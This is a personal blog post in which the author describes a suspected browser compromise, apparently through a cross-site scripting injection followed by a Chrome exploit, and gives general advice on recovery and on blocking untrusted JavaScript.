Getting Pwnd by a Chinese 0day

While it is bound to happen to everyone, having your computer compromised is never fun. I recently had this happen to me, and wanted to share some tips on how/why it happened, how to protect yourself, and how to recover from such an event.

 

 


 

How It Happened

In this case, I was looking up information on google about making a rar file from a linux command line, at a certain size. I Googled the answer as everyone does, and clicked on the first result. That link lead me to a forum where someone else had the same question. Not locating my answer, I hit back and clicked on the second result, an ‘answers’ type website (similar to a blog/forum). Still no good answer, I clicked back. KABOOOOM. Now keep in mind I use Google Chrome, which automatically updates itself, and notifies you/blocks plug-ins which are out to date (ref). This means the attacker used an 0day.

0day

An 0day is hacker lingo for an exploit which is found in the wild (on the Internet) before the vulnerability is reported to the vendor. As such, there is no patch and no way to defend yourself. Antivirus? Worthless.

What Actually Happened

I have not had the time to safely retrace my steps and analyze the source code, so this portion will be an assumption, but the general principals still hold true. This attack was more than likely not targeted, and involved not only a cross site scripting (XSS) vulnerability, but also a buffer overflow. The cross site scripting portion of he attack was placed on either the blog or the forum. Both are highly likely since, by their very nature, they allow users to submit content to the site. Unfortunately this user’s intent was malicious. The malicious user posted a reply/comment which included code that then gets executed in the web browser of anyone who visits this page. In this case, that would be my browser. Now keep in mind that the ability to post code to someone‘s blog/forum is a vulnerability, and unexpected behavior. From the point of my browser executing the code (which is often only one line of code), it more than likely went to load additional code on another website. The other website, being one owned/controlled by the malicious user who wants to gain control of my computer. The additional code that my computer then loads contains code to exploit a flaw in Google Chrome. Fortunately for me, the error box I saw means the exploit was more than likely not successful. Better safe than sorry though!

How to Protect Yourself

At this point we have to make a few assumptions, anything you do on your computer is being watched/recorded/monitored by the attacker, and ALL of your files are being stolen (exfiltrated) by the attacker. Screwed? Not entirely, but it is time to be very cautious.

  • Unplug from the network/Internet. This is definitely step 1. If you are not online, the attacker can no longer get your files or monitor you.
  • Second thing we need to do is to get your files of the computer as, we will have to rebuild it from scratch. To do this, we will more than likely need to plug it back into the network.
    • To do so safely, download a bootable iso (backtrack, ubuntu, fedora) and use that. Using a bootable iso will prevent the attacker from being able to reconnect to your computer. Now back your files up to a different computer.
  • Once that is done, it is time to wipe your computer and reinstall your operating system, and all of your software. Big pain in the butt? Definitely. But having your identity or credit cards stolen is much worse!

Prevention

So, how can we stop this from happening? First, keep in mind we are dealing with an 0day, so there is no patch available. For a XSS based attack, we need to prevent scripts from running, especially ones from untrusted websites. To accomplish this in Mozilla Firefox, simply use No Script. In Google Chrome, you need to dig into the options. Click the wrench icon in the top right corner.  Select Preferences > Under The Hood > Under Privacy, click Content Settings…, select Java Script.  You can now set your options.  Disabling all java scripts may make certain websites (almost all) look funny/different.  You will have to allow sites to run some java script, but the key is to only run java script for the page your are going to.  For example, if you go to www.myfavoritesite.com, No Script may tell you that three different sites want to run java script: myfavoritesite.com, aMALICIOUSsite.com, and googleTracker.com.  In this case you would only want to run myfavoritesite.com since that is the page you are at.

 

Comments are closed